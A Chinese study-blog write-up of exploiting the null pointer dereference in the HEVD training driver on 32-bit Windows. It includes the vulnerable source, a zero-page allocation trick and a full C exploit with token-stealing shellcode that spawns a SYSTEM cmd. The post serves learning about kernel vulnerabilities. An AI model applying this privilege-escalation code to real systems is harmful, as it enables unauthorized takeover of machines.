Wwoc
Wwoc

Windows内核漏洞学习-空指针解引用

0x00: 前言

​ 在看雪论坛看到许多关于HEVD的Windows内核漏洞教程,其中有一个是翻译国外的一个系列,感觉讲的很好,接下来就会跟着他将这个HEVD系列的漏洞走一遍了。昨天学了栈溢出,其实以前就学过,只不过没有操作过内核态的,今天继续学习空指针解引用,也是比较简单的漏洞,方便入门。

  • 传送门

0x01: 漏洞原理

首先看漏洞程序源码

NTSTATUS TriggerNullPointerDereference(IN PVOID UserBuffer) {
     
    ULONG UserValue = 0;
    ULONG MagicValue = 0xBAD0B0B0;
    NTSTATUS Status = STATUS_SUCCESS;
    PNULL_POINTER_DEREFERENCE NullPointerDereference = NULL;

    PAGED_CODE();

    __try {
     
        // Verify if the buffer resides in user mode
        ProbeForRead(UserBuffer,
                     sizeof(NULL_POINTER_DEREFERENCE),
                     (ULONG)__alignof(NULL_POINTER_DEREFERENCE));

        // Allocate Pool chunk
        NullPointerDereference = (PNULL_POINTER_DEREFERENCE)
                                  ExAllocatePoolWithTag(NonPagedPool,
                                                        sizeof(NULL_POINTER_DEREFERENCE),
                                                        (ULONG)POOL_TAG);

        if (!NullPointerDereference) {
     
            // Unable to allocate Pool chunk
            DbgPrint("[-] Unable to allocate Pool chunk\n");

            Status = STATUS_NO_MEMORY;
            return Status;
        }
        else {
     
            DbgPrint("[+] Pool Tag: %s\n", STRINGIFY(POOL_TAG));
            DbgPrint("[+] Pool Type: %s\n", STRINGIFY(NonPagedPool));
            DbgPrint("[+] Pool Size: 0x%X\n", sizeof(NULL_POINTER_DEREFERENCE));
            DbgPrint("[+] Pool Chunk: 0x%p\n", NullPointerDereference);
        }

        // Get the value from user mode
        UserValue = *(PULONG)UserBuffer;

        DbgPrint("[+] UserValue: 0x%p\n", UserValue);
        DbgPrint("[+] NullPointerDereference: 0x%p\n", NullPointerDereference);

        // Validate the magic value
        if (UserValue == MagicValue) {
     
            NullPointerDereference->Value = UserValue;
            NullPointerDereference->Callback = &NullPointerDereferenceObjectCallback;

            DbgPrint("[+] NullPointerDereference->Value: 0x%p\n", NullPointerDereference->Value);
            DbgPrint("[+] NullPointerDereference->Callback: 0x%p\n", NullPointerDereference->Callback);
        }
        else {
     
            DbgPrint("[+] Freeing NullPointerDereference Object\n");
            DbgPrint("[+] Pool Tag: %s\n", STRINGIFY(POOL_TAG));
            DbgPrint("[+] Pool Chunk: 0x%p\n", NullPointerDereference);

            // Free the allocated Pool chunk
            ExFreePoolWithTag((PVOID)NullPointerDereference, (ULONG)POOL_TAG);

            // Set to NULL to avoid dangling pointer
            NullPointerDereference = NULL;
        }

#ifdef SECURE
        // Secure Note: This is secure because the developer is checking if
        // 'NullPointerDereference' is not NULL before calling the callback function
        if (NullPointerDereference) {
     
            NullPointerDereference->Callback();
        }
#else
        DbgPrint("[+] Triggering Null Pointer Dereference\n");

        // Vulnerability Note: This is a vanilla Null Pointer Dereference vulnerability
        // because the developer is not validating if 'NullPointerDereference' is NULL
        // before calling the callback function
        NullPointerDereference->Callback();
#endif
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
     
        Status = GetExceptionCode();
        DbgPrint("[-] Exception Code: 0x%X\n", Status);
    }

    return Status;
}

​ 通过安全版和不安全版本的代码对比即可知道,安全版本在检验指针不为空的情况下再去调用 Callback回调函数,而不安全版本则不进行检查。阅读程序的流程:首先检验用户输入的数据是否等于一个魔数,如果检验通过则对 NullPointerDereference 的回调函数和值进行设置,如果不通过则将 NullPointerDereference 设置为NULL。在最后,即使指针为空也仍然去调用它的回调函数,这显然是不行,的当一个指针的值为空时,却被调用指向某一块内存地址时,就产生了空指针引用漏洞。

0x02:漏洞分析

通过在IDA里进行标注分析:当指针为空时,会call [4],所以当下所需要做的事就是传入一个不匹配的魔数,并在0x00000004分配一个双字地址。

Windows内核漏洞学习-空指针解引用_第1张图片

一开始可能会想,地址那么低怎么把Shellcode放到0x00000004的地址呢?Windows允许低权限用户去映射用户进程的上下文到0页。虽然我们使用 VirutalAlloc和VirtualAllocEx 在申请基地址低于0x00001000时候都会被拒绝访问,但是我们可以使用NtAllocateVirtualMemory来完成这个操作。

BaseAddress
期望内存基址指针。
当该值非零时,系统将计算此值的页对齐地址,尝试按照此地址申请内存块。
当该值等于零时,系统将寻找第一个未使用内存块。
当函数调用成功时,此参数亦将接收实际基址。

0x03:漏洞利用

首先申请到0页内存

PVOID BaseAddress= (PVOID)1;
SIZE_T RegionSize = 0x1000;
/* 这里对第二个参数进行解释 
BaseAddress
期望内存基址指针。
当该值非零时,系统将计算此值的页对齐地址,尝试按照此地址申请内存块。
当该值等于零时,系统将寻找第一个未使用内存块。
当函数调用成功时,此参数亦将接收实际基址。 */
printf("[+]Started to alloc zero page...\n");
if (!NT_SUCCESS(NtAllocateVirtualMemory(
    INVALID_HANDLE_VALUE,
    &BaseAddress,
    0,
    &RegionSize,
    MEM_COMMIT | MEM_RESERVE,
    PAGE_READWRITE)) || Zero_addr != NULL)
{
     
    printf("[+]Failed to alloc zero page!\n");
    system("pause");
    return 0;
}
 
printf("[+]Success to alloc zero page...\n");
printf("申请到的地址是 0x%p\n", BaseAddress);
*(DWORD*)(0x4) = (DWORD)& ShellCode;

可以看到成功申请到了0内存,所以接下来只需要将Shellcode存放在该地址即可。

Windows内核漏洞学习-空指针解引用_第2张图片
完整的代码为:

#include
#include

#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#define Null_Pointer_Dereference 0x22202b

HANDLE hDevice = NULL;

typedef NTSTATUS
(WINAPI* My_NtAllocateVirtualMemory)(
	IN HANDLE ProcessHandle,
	IN OUT PVOID* BaseAddress,
	IN ULONG ZeroBits,
	IN OUT PULONG RegionSize,
	IN ULONG AllocationType,
	IN ULONG Protect
	);

My_NtAllocateVirtualMemory NtAllocateVirtualMemory = NULL;

static VOID ShellCode()
{
     
	_asm
	{
     
		//int 3
		pushad
		mov eax, fs: [124h]		// Find the _KTHREAD structure for the current thread
		mov eax, [eax + 0x50]   // Find the _EPROCESS structure
		mov ecx, eax
		mov edx, 4				// edx = system PID(4)

		// The loop is to get the _EPROCESS of the system
		find_sys_pid :
		mov eax, [eax + 0xb8]	// Find the process activity list
		sub eax, 0xb8    		// List traversal
		cmp[eax + 0xb4], edx    // Determine whether it is SYSTEM based on PID
		jnz find_sys_pid

		// Replace the Token
		mov edx, [eax + 0xf8]
		mov[ecx + 0xf8], edx
		popad
		//int 3
		ret
	}
}

BOOL init()
{
     
	// Get HANDLE
	hDevice = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver",
		GENERIC_READ | GENERIC_WRITE,
		NULL,
		NULL,
		OPEN_EXISTING,
		NULL,
		NULL);

	printf("[+]Start to get HANDLE...\n");
	if (hDevice == INVALID_HANDLE_VALUE || hDevice == NULL)
	{
     
		return FALSE;
	}
	printf("[+]Success to get HANDLE!\n");
	return TRUE;
}

static VOID CreateCmd()
{
     
	STARTUPINFO si = {
      sizeof(si) };
	PROCESS_INFORMATION pi = {
      0 };
	si.dwFlags = STARTF_USESHOWWINDOW;
	si.wShowWindow = SW_SHOW;
	WCHAR wzFilePath[MAX_PATH] = {
      L"cmd.exe" };
	BOOL bReturn = CreateProcessW(NULL, wzFilePath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, (LPSTARTUPINFOW)&si, &pi);
	if (bReturn) CloseHandle(pi.hThread), CloseHandle(pi.hProcess);
}

VOID Trigger_shellcode()
{
     
	DWORD bReturn = 0;
	char buf[4] = {
      0 };
	*(PDWORD32)(buf) = 0xBAD0B0B0+1;//测试申请到的地址时不加一即可

	*(FARPROC*)&NtAllocateVirtualMemory = GetProcAddress(
		GetModuleHandleW(L"ntdll"),
		"NtAllocateVirtualMemory");

	if (NtAllocateVirtualMemory == NULL)
	{
     
		printf("[+]Failed to get function NtAllocateVirtualMemory!!!\n");
		system("pause");
		return ;
	}

	PVOID Zero_addr = (PVOID)1;
	SIZE_T RegionSize = 0x1000;

	printf("[+]Started to alloc zero page...\n");
	if (!NT_SUCCESS(NtAllocateVirtualMemory(
		INVALID_HANDLE_VALUE,
		&Zero_addr,
		0,
		&RegionSize,
		MEM_COMMIT | MEM_RESERVE,
		PAGE_READWRITE)) || Zero_addr != NULL)
	{
     
		printf("[+]Failed to alloc zero page!\n");
		system("pause");
		return ;
		
	}

	printf("[+]Success to alloc zero page...\n");
	printf("申请到的地址是 0x%p\n", Zero_addr);
	*(DWORD*)(0x4) = (DWORD)&ShellCode;

	DeviceIoControl(hDevice, Null_Pointer_Dereference, buf, 4, NULL, 0, &bReturn, NULL);
}

int main()
{
     

	if (init() == FALSE)
	{
     
		printf("[+]Failed to get HANDLE!!!\n");
		system("pause");
		return 0;
	}

	Trigger_shellcode();
	//__debugbreak();

	printf("[+]Start to Create cmd...\n");
	CreateCmd();
	system("pause");

	return 0;
}

利用成功

Windows内核漏洞学习-空指针解引用_第3张图片

0x04:明日计划

继续学习内核漏洞利用

你可能感兴趣的:(内核漏洞,学习记录)

  • CEF桌面应用的自动化 大胖丫 自动化pythonseleniumpython
    开发跨平台桌面软件,目前比较流行的框架有CEF,是基于Chromium浏览器内核的。这样的PC应用,同样可以使用Selenium进行自动化测试。但是,selenium,是怎么启动浏览器的,大家,就需要去了解下webdriver原理。知道怎么用webdriver去操控浏览器,就知道了,怎么去操控桌面软件。那在WebDriver脚本运行的时候,它们之间是如何通信的呢?为什么同一个browserdriv
  • Linux 4.xx内核+Go 1.15出core排查 1-programmer GoGoLinuxOSlinuxgolang
    Goruntime出core在使用gozero框架的开发数据库管理服务的过程中,经常出core。通过dlv查看core的位置,各个地方都有,典型的有以下两种:runtime在执行init函数时,某个空串对应的地址上其长度不对,应该是0,却是一个负值。runtime中初始化timer时,timer的某个应该为正整数的属性,变成了负值。明确是踩了内存,但一时间找不到思路。0x01怀疑是CGO由于CGO
  • zswap 数据结构维护解析 仙度瑞拉快点跑 数据结构
    zswap数据结构维护解析zswap是Linux内核中的一个前端压缩交换(swap)机制,它在内存中维护一个zpool来存储被压缩的页面,以减少磁盘I/O并提高性能。以下是zswap维护加解压相关数据结构的核心解析。1.zswap的核心数据结构1.1structzswap_entryzswap_entry结构体表示zswap维护的每个压缩页面的元数据。structzswap_entry{struc
  • 【Linux 进程状态】—— 从创建到消亡的全生命周期 一整颗红豆 Linux驾驭之道掌控操作系统的艺术与哲学linux运维开发python
    欢迎来到ZyyOvO的博客✨,一个关于探索技术的角落,记录学习的点滴,分享实用的技巧️,偶尔还有一些奇思妙想本文由ZyyOvO原创✍️,感谢支持❤️!请尊重原创!欢迎评论区留言交流个人主页ZyyOvO本文专栏➡️Linux驾驭之道掌控操作系统的艺术与哲学各位于晏,亦菲们请看引言==进程=内核数据结构+自己的代码和数据==系统调用fork函数功能返回值代码层面理解进程状态Linux内核源代码进程状态
  • STM32MP157A-DK1开发板评估:官方OpenSTLinux烧录 2301_79326616 stm32单片机嵌入式硬件
    介绍:在本篇文章中,我们将详细介绍如何将官方OpenSTLinux操作系统烧录到STM32MP157A-DK1开发板上。我们将逐步说明所需的步骤,并提供相应的源代码以供参考。STM32MP157A-DK1开发板是一款基于STMicroelectronics的STM32MP1系列微处理器的开发板,该系列微处理器结合了Cortex-A7和Cortex-M4内核。OpenSTLinux是STMicroe
  • 解锁Linux性能密码:25个实用调优技巧 大雨淅淅 Linuxlinux运维
    目录一、引言二、系统资源监控工具2.1top和htop2.2vmstat2.3iostat三、内核参数优化3.1调整swappiness参数3.2优化I/O调度器3.3调整dirty_ratio和dirty_background_ratio3.4启用大页内存(HugePages)3.5调整内核参数net.core.somaxconn四、网络性能优化4.1优化网络缓冲区4.2调整tcp_tw_rec
  • 【oracle19c静默安装RAC】 sqlboy-yuzhenc DBAORACLEoracle数据库
    目录安装规划软件规划虚拟机规划主机信息网络规划硬盘规划ASM磁盘组Oracle规划用户组和用户软件目录规划整体数据库安装规划虚拟机准备操作系统安装yum源配置openfiler安装安装前准备配置host文件(rac1和rac2)关闭防火墙(rac1和rac2)关闭Selinux(rac1和rac2)安装依赖包(rac1和rac2)修改内核参数(rac1和rac2)配置资源限制参数(rac1和rac
  • linux日志管理_日志系统 Guff_hys linux运维服务器eclipseide开发语言程序人生
    10.1日志系统(系统日志管理)syslog&rsyslog日志:主要用途是系统审计、监测追踪和分析统计。​Linux内核由很多子系统组成,包括网络、文件访问、内存管理等。子系统需要给用户传送一些消息,这些消息内容包括消息的来源及其重要性等。所有的子系统都要把消息送到一个可以维护的公用消息区,于是就有了syslog。​syslog是一个综合的日志记录系统,它广泛应用于各种类UNIX系统上。它的主要
  • 每日十个计算机专有名词 (7) 太炀 每日十个计算机专有名词杂项
    Metasploit词源:Meta(超越,超出)+exploit(漏洞利用)Metasploit是一个安全测试框架,用来帮助安全专家(也叫渗透测试人员)发现和利用计算机系统中的漏洞。你可以把它想象成一个工具箱,里面装满了各种可以测试网络和应用程序安全的工具。它有很多预设的“攻击模块”,这些模块可以模拟黑客的攻击方式,帮助你检查自己的系统是否容易受到攻击。通过这些攻击模拟,你可以发现安全漏洞,并及时
  • 【系统稳定性】1.11 QVM稳定性问题分析 高桐@BILL qnx座舱系统智能座舱
    目录写在前面一,qvm进程异常1.1进程崩溃(Coredump)1.2进程卡死1.3进程重启二,qvm进程异常分析过程写在前面在QVM(QuantumVirtualMachine)作为HOSTQNX的Guest,同样会遇到重启、Watchdog(看门狗)等稳定性问题。这里我们把qvm的异常归类为两类问题,如下:qvm进程异常qmv中la异常qvm进程异常就很好理解了,我们就把他作为一个qnx内核上
  • 科技快讯 | DeepSeek宣布开源DeepGEMM;多个团队开发AI论文反识别技术;OpenAI GPT 4.5现身Android测试版,即将发布 最新科技快讯 科技
    DeepSeek宣布开源DeepGEMM财联社2月26日电,Deepseek于开源周第三天宣布开源DeepGEMM。DeepGEMM是一个专为简洁高效的FP8通用矩阵乘法(GEMM)设计的库,具有细粒度缩放功能,如DeepSeek-V3中所提出。它支持普通和混合专家(MoE)分组的GEMM。该库采用CUDA编写,在安装过程中无需编译,通过使用轻量级的即时编译(JIT)模块在运行时编译所有内核。FP
  • 目录遍历文件包含测试 蚂蚁质量 安全测试安全web安全网络
    众多Web应用程序在日常运作中,都离不开对文件的使用与管理。然而,一旦应用程序所采用的输入验证方法设计欠佳或部署不当,攻击者便有机可乘,利用这类漏洞对系统发起攻击,进而读取或写入那些本不应被随意访问的文件。在某些极端情形下,攻击者甚至能够借助此漏洞执行任意代码或系统命令。传统意义上,Web服务器与Web应用程序通常会部署身份验证机制,以此来管控对文件及资源的访问权限。Web服务器会尽力将用户可访问
  • 2-1文件描述符 要好好养胃 linuxlinux服务器
    文章目录1虚拟地址空间1.1为什么需要虚拟内存而不是直接加载进物理内存1.2分区2文件描述符1.1文件描述符表file1虚拟地址空间可以用来加载程序数据对应一段连续的内存地址,其实位置为0这个内存地址是虚拟的,并不是物理内存的0地址当运行磁盘上的一个可执行程序,就会得到一个进程,内核会给每一个进程创建一个虚拟地址空间,并将应用程序装载到虚拟地址空间对应的内存中进程在运行过程中,程序内部的指令都是通
  • 或许我们都被分库分表约束了思维 京东云开发者 京东云
    作者:张俊杰概述这篇文章没什么太多的干货,纯纯是一篇讨论和思考帖。从业数据库领域三年有余了,从分库分表中间件到数据库团队内核学到了很多东西。也接触了很多项目,包括TiDB、Vitess、Polardb、StarDB等等。国内的项目好像很多都聚焦于分库分表的概念,包括很多的数据库团队都在尝试这个概念的落地和沉溺于性能的跑分。最近我在预览MySQL官方,看到了Partitioning的概念,而且占据了
  • 自由软件与Linux:一段共同的革命性旅程 寒水馨 Linux问题解决方案linux运维服务器
    自由软件与Linux:一段共同的革命性旅程摘要本文深入探讨了自由软件运动和Linux操作系统的发展历程、关系及其对现代技术世界的影响。文章详细介绍了自由软件的定义、GNU项目的诞生、Linux内核的发展,以及两者如何结合形成了完整的GNU/Linux操作系统。同时,文章还探讨了开源开发模式的优势、Linux在各个领域的应用,以及自由软件和Linux面临的挑战和未来展望。通过本文,读者将全面了解自由
  • 通过理解 sk_buff 深入掌握 Linux 内核自定义协议族的开发实现 109702008 编程#C语言网络linux网络人工智能
    要开发Linux内核中的自定义协议族(如私有传输层或网络层协议),需基于sk_buff的结构和操作,结合内核网络栈的扩展机制。以下是实现这一目标的分步指南:1.协议族开发的核心步骤(1)注册自定义协议族定义协议号在或自定义头文件中分配唯一的协议标识符(例如ETH_P_MYPROTO)。注册协议处理函数使用dev_add_pack()(链路层)或inet_add_protocol()(网络层)注册协
  • 浅析eBPF 9命怪猫 运维可视化运维
    目录一、eBPF原理二、eBPF已可投入使用的场景三、eBPF与Jaeger/Zipkin的区别及先进性四、使用eBPF的开源软件五、开源软件的局限性或待实现功能猫哥说一、eBPF原理eBPF(extendedBerkeleyPacketFilter)是一种内核技术,允许用户在内核空间安全、高效地运行自定义程序,而无需修改内核代码或加载内核模块。核心概念:BPF虚拟机:内核中的一个轻量级虚拟机,负
  • Linux内核自定义协议族开发指南:理解net_device_ops、proto_ops与net_proto_family 109702008 编程#C语言网络人工智能linux
    在Linux内核中开发自定义协议族需要深入理解网络协议栈的分层模型。net_device_ops、proto_ops和net_proto_family是三个关键结构体,分别作用于不同的层次。本文将详细解析它们的作用、交互关系及实现方法,并提供一个完整的开发框架。一、核心结构体的作用与层级关系structnet_device_ops层级:网络设备驱动层(数据链路层)职责:定义物理/虚拟网络设备的操作
  • Windows和AD域提权枚举脚本及工具介绍 vortex5 网络安全安全windows
    在Windows和ActiveDirectory(AD)域环境中,权限提升和枚举是渗透测试的关键部分。为了有效进行这些操作,使用特定的工具和脚本可以帮助你识别和利用系统中的漏洞。以下是一些常用于Windows和AD域环境中的权限提升和枚举脚本工具:Windows环境中的提权枚举脚本PowerUp描述:PowerUp是一个PowerShell脚本,专注于在Windows系统中查找权限提升漏洞。它能够
  • php序列化与反序列化 lally. phpandroid开发语言
    文章目录基础知识魔术方法:在序列化和反序列化过程中自动调用的方法什么是`__destruct()`方法?何时触发`__destruct()`方法?用途:语法示例:反序列化漏洞利用前提条件一些绕过策略绕过__wakeup函数绕过正则匹配绕过相等逻辑判断利用大S的ascll码绕过反序列化字符逃逸高级反序列化phar反序列化什么是PHAR文件?特点session反序列化基础知识序列化:将对象转化为一个可
  • 鸿蒙系统的架构分为四个层 荔枝寄 harmonyos架构华为
    鸿蒙操作系统(HarmonyOS)是华为自主研发的面向全场景的分布式操作系统,旨在为用户提供跨设备无缝协同体验。它不仅支持手机、平板、智能穿戴等终端设备,还涵盖了智能家居、车联网等多个领域。为了有效地开发基于鸿蒙的应用程序,理解其系统架构是至关重要的。鸿蒙系统的架构分为四个层次:内核层、系统服务层、框架层和应用层。每一层都有其特定的功能,并且各层之间通过接口进行交互。下面我们将详细介绍每个层次的内
  • CSRF 跨站请求伪造漏洞 看繁星aa csrfhttp网络安全web安全
    原理当一个网站A使用Cookie,存储Session或Token来用于单点登录和权限操作时。浏览器将Cookie存储到浏览器中。当用户在访问另一个网站V时,黑客可以通过伪造表单,向网站A发送修改重要信息(如密码)、支付等操作,浏览器会自动携带Cookie。在服务端看来这就是一个正常的请求,于是在用户不知情的情况下,做出响应。两个条件用户访问站点A并产生了Cookie用户没有退出站点A(清除Cook
  • 基于web漏洞扫描及分析系统设计 毕设工作室_wlzytw python论文项目前端pythondjangoflasktornadopyqtplotly
    基于web漏洞扫描及分析系统设计摘要随着信息技术的发展和网络应用在我国的普及,针对我国境内信息系统的恶意网络攻击也越来越多,并且随着黑客攻击技术的不断地更新,网络犯罪行为变得越来越难以应对,用户日常访问的网站是否安全对于普通网民而言难以辨别,保护人民不受不法侵害也是难上加难。如何识别网站的潜在危险性,以及网站出现安全性问题该如何防御,尽可能减少网站被攻击后造成的实际损失,是目前迫切需要解决的难题。
  • liunx基本操作 峰过林 liunx服务器linux运维
    Linux关机,重启#关机shutdown-hnow#重启shutdown-rnow查看系统,CPU信息查看系统内核版本cat/proc/version查看系统内核信息uname-a查看当前用户环境变量envcat/proc/cpuinfo查看有几个逻辑cpu,包括cpu型号cat/proc/cpuinfo|grepname|cut-f2-d:|uniq-c查看有几颗cpu,每颗分别是几核cat/
  • 松灵机器人地盘 安装 ros 驱动 并且 发布ros 指令进行控制 luoganttcc 机器人机器人
    安装驱动$cd~/catkin_ws/src$gitclonehttps://github.com/agilexrobotics/ugv_sdk.git$gitclonehttps://github.com/agilexrobotics/scout_ros.git$cd..$catkin_make安装●使能gs_usb内核模块●设置500k波特率和使能can-to-usb适配器sudomodpro
  • Linux 测试必须知道的命令 那片海还在吗 testlinux
    Linux测试必须知道的命令一、系统信息查看命令1.1uname-查看系统基本信息作用:用于显示系统的相关信息,如内核名称、主机名、内核版本等。常用参数及示例-a:显示所有信息。uname-a#输出示例:Linuxtest-server5.4.0-109-generic#123-UbuntuSMPFriApr2116:52:16UTC2023x86_64x86_64x86_64GNU/Linux1
  • DeepSeek开源周Day1:FlashMLA引爆AI推理性能革命! 歌刎 每周追踪AI框架新动态最前沿的大模型训练部署实践手册DeepSeek人工智能深度学习AIGCNLPDeepSeek
    项目地址:GitHub-deepseek-ai/FlashMLA开源日历:2025-02-24起每日9AM(北京时间)更新,持续五天!一、开源周震撼启幕继上周预告后,DeepSeek于北京时间今晨9点准时开源「FlashMLA」,打响开源周五连发第一枪!作为专为Hopper架构GPU(H800/H100)优化的高效解码内核,该项目一经发布便引爆社区:上线45分钟斩获400+Star,3小时突破2.
  • JeeWMS graphReportController.do SQL注入漏洞复现(CVE-2025-0392) iSee857 漏洞复现安全web安全
    免责申明:本文所描述的漏洞及其复现步骤仅供网络安全研究与教育目的使用。任何人不得将本文提供的信息用于非法目的或未经授权的系统测试。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我们联系,我们将尽快处理并删除相关内容。0x01产品描述:JeeWMS是一款基于JavaEE企业级架构开发的开源仓库管理系统(WMS),专为优化仓储管理和物流操作而设计。它支持多仓库、多货主
  • NAKIVO Backup & Replication任意文件读取漏洞(CVE-2024-48248) iSee857 漏洞复现安全web安全
    免责申明:本文所描述的漏洞及其复现步骤仅供网络安全研究与教育目的使用。任何人不得将本文提供的信息用于非法目的或未经授权的系统测试。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我们联系,我们将尽快处理并删除相关内容。0x01产品描述:NAKIVOBackup&Replication是一款快速、经济实惠且一流的备份和灾难恢复解决方案,适用于VMwarevSphere
  • OWASP TOP 10漏洞检测指南 软件测试安全性测试
    引言随着Web应用的日益复杂,安全漏洞层出不穷,给企业和个人带来了巨大的安全风险。OWASP(开放Web应用安全项目)每三年发布一次OWASPTop10,列出了最常见、最危险的Web应用安全漏洞。本文将深入解析OWASPTop102023版本的漏洞,并介绍检测这些漏洞的最佳实践。一、OWASPTop102023概览OWASPTop102023版本涵盖了以下关键安全风险:A01-失效的访问控制(Br
  • JVM StackMapTable 属性的作用及理解 lijingyao8206 jvm字节码Class文件StackMapTable
            在Java 6版本之后JVM引入了栈图(Stack Map Table)概念。为了提高验证过程的效率,在字节码规范中添加了Stack Map Table属性,以下简称栈图,其方法的code属性中存储了局部变量和操作数的类型验证以及字节码的偏移量。也就是一个method需要且仅对应一个Stack Map Table。在Java 7版
  • 回调函数调用方法 百合不是茶 java
    最近在看大神写的代码时,.发现其中使用了很多的回调 ,以前只是在学习的时候经常用到 ,现在写个笔记 记录一下   代码很简单:           MainDemo  :调用方法  得到方法的返回结果        
  • [时间机器]制造时间机器需要一些材料 comsci 制造
          根据我的计算和推测,要完全实现制造一台时间机器,需要某些我们这个世界不存在的物质     和材料...       甚至可以这样说,这种材料和物质,我们在反应堆中也无法获得......      
  • 开口埋怨不如闭口做事 邓集海 邓集海 做人 做事 工作
    “开口埋怨,不如闭口做事。”不是名人名言,而是一个普通父亲对儿子的训导。但是,因为这句训导,这位普通父亲却造就了一个名人儿子。这位普通父亲造就的名人儿子,叫张明正。      张明正出身贫寒,读书时成绩差,常挨老师批评。高中毕业,张明正连普通大学的分数线都没上。高考成绩出来后,平时开口怨这怨那的张明正,不从自身找原因,而是不停地埋怨自己家庭条件不好、埋怨父母没有给他创造良好的学习环境。      
  • jQuery插件开发全解析,类级别与对象级别开发 IT独行者 jquery开发插件 函数
    jQuery插件的开发包括两种: 一种是类级别的插件开发,即给 jQuery添加新的全局函数,相当于给 jQuery类本身添加方法。 jQuery的全局函数就是属于 jQuery命名空间的函数,另一种是对象级别的插件开发,即给 jQuery对象添加方法。下面就两种函数的开发做详细的说明。   1 、类级别的插件开发 类级别的插件开发最直接的理解就是给jQuer
  • Rome解析Rss 413277409 Rome解析Rss
    import java.net.URL;  import java.util.List;    import org.junit.Test;    import com.sun.syndication.feed.synd.SyndCategory;  import com.sun.syndication.feed.synd.S
  • RSA加密解密 无量 加密解密rsa
    RSA加密解密代码 代码有待整理 package com.tongbanjie.commons.util; import java.security.Key; import java.security.KeyFactory; import java.security.KeyPair; import java.security.KeyPairGenerat
  • linux 软件安装遇到的问题 aichenglong linux遇到的问题ftp
    1 ftp配置中遇到的问题    500 OOPS: cannot change directory   出现该问题的原因:是SELinux安装机制的问题.只要disable SELinux就可以了   修改方法:1 修改/etc/selinux/config 中SELINUX=disabled    2 source /etc
  • 面试心得 alafqq 面试
    最近面试了好几家公司。记录下; 支付宝,面试我的人胖胖的,看着人挺好的;博彦外包的职位,面试失败; 阿里金融,面试官人也挺和善,只不过我让他吐血了。。。 由于印象比较深,记录下; 1,自我介绍 2,说下八种基本类型;(算上string。楼主才答了3种,哈哈,string其实不是基本类型,是引用类型) 3,什么是包装类,包装类的优点; 4,平时看过什么书?NND,什么书都没看过。。照样
  • java的多态性探讨 百合不是茶 java
    java的多态性是指main方法在调用属性的时候类可以对这一属性做出反应的情况 //package 1; class A{ public void test(){ System.out.println("A"); } } class D extends A{ public void test(){ S
  • 网络编程基础篇之JavaScript-学习笔记 bijian1013 JavaScript
    1.documentWrite <html> <head> <script language="JavaScript"> document.write("这是电脑网络学校"); document.close(); </script> </h
  • 探索JUnit4扩展:深入Rule bijian1013 JUnitRule单元测试
            本文将进一步探究Rule的应用,展示如何使用Rule来替代@BeforeClass,@AfterClass,@Before和@After的功能。         在上一篇中提到,可以使用Rule替代现有的大部分Runner扩展,而且也不提倡对Runner中的withBefores(),withAfte
  • [CSS]CSS浮动十五条规则 bit1129 css
    这些浮动规则,主要是参考CSS权威指南关于浮动规则的总结,然后添加一些简单的例子以验证和理解这些规则。   1. 所有的页面元素都可以浮动 2. 一个元素浮动后,会成为块级元素,比如<span>,a, strong等都会变成块级元素 3.一个元素左浮动,会向最近的块级父元素的左上角移动,直到浮动元素的左外边界碰到块级父元素的左内边界;如果这个块级父元素已经有浮动元素停靠了
  • 【Kafka六】Kafka Producer和Consumer多Broker、多Partition场景 bit1129 partition
    0.Kafka服务器配置 3个broker 1个topic,6个partition,副本因子是2 2个consumer,每个consumer三个线程并发读取   1. Producer package kafka.examples.multibrokers.producers; import java.util.Properties; import java.util.
  • zabbix_agentd.conf配置文件详解 ronin47 zabbix 配置文件
    Aliaskey的别名,例如 Alias=ttlsa.userid:vfs.file.regexp[/etc/passwd,^ttlsa:.:([0-9]+),,,,\1], 或者ttlsa的用户ID。你可以使用key:vfs.file.regexp[/etc/passwd,^ttlsa:.: ([0-9]+),,,,\1],也可以使用ttlsa.userid。备注: 别名不能重复,但是可以有多个
  • java--19.用矩阵求Fibonacci数列的第N项 bylijinnan fibonacci
    参考了网上的思路,写了个Java版的: public class Fibonacci { final static int[] A={1,1,1,0}; public static void main(String[] args) { int n=7; for(int i=0;i<=n;i++){ int f=fibonac
  • Netty源码学习-LengthFieldBasedFrameDecoder bylijinnan javanetty
    先看看LengthFieldBasedFrameDecoder的官方API http://docs.jboss.org/netty/3.1/api/org/jboss/netty/handler/codec/frame/LengthFieldBasedFrameDecoder.html API举例说明了LengthFieldBasedFrameDecoder的解析机制,如下: 实
  • AES加密解密 chicony 加密解密
    AES加解密算法,使用Base64做转码以及辅助加密: package com.wintv.common; import javax.crypto.Cipher; import javax.crypto.spec.IvParameterSpec; import javax.crypto.spec.SecretKeySpec; import sun.misc.BASE64Decod
  • 文件编码格式转换 ctrain 编码格式
    package com.test; import java.io.File; import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream;
  • mysql 在linux客户端插入数据中文乱码 daizj mysql中文乱码
    1、查看系统客户端,数据库,连接层的编码  查看方法: http://daizj.iteye.com/blog/2174993 进入mysql,通过如下命令查看数据库编码方式: mysql>  show variables like 'character_set_%'; +--------------------------+------
  • 好代码是廉价的代码 dcj3sjt126com 程序员读书
      长久以来我一直主张:好代码是廉价的代码。 当我跟做开发的同事说出这话时,他们的第一反应是一种惊愕,然后是将近一个星期的嘲笑,把它当作一个笑话来讲。 当他们走近看我的表情、知道我是认真的时,才收敛一点。 当最初的惊愕消退后,他们会用一些这样的话来反驳: “好代码不廉价,好代码是采用经过数十年计算机科学研究和积累得出的最佳实践设计模式和方法论建立起来的精心制作的程序代码。” 我只
  • Android网络请求库——android-async-http dcj3sjt126com android
    在iOS开发中有大名鼎鼎的ASIHttpRequest库,用来处理网络请求操作,今天要介绍的是一个在Android上同样强大的网络请求库android-async-http,目前非常火的应用Instagram和Pinterest的Android版就是用的这个网络请求库。这个网络请求库是基于Apache HttpClient库之上的一个异步网络请求处理库,网络处理均基于Android的非UI线程,通
  • ORACLE 复习笔记之SQL语句的优化 eksliang SQL优化Oracle sql语句优化SQL语句的优化
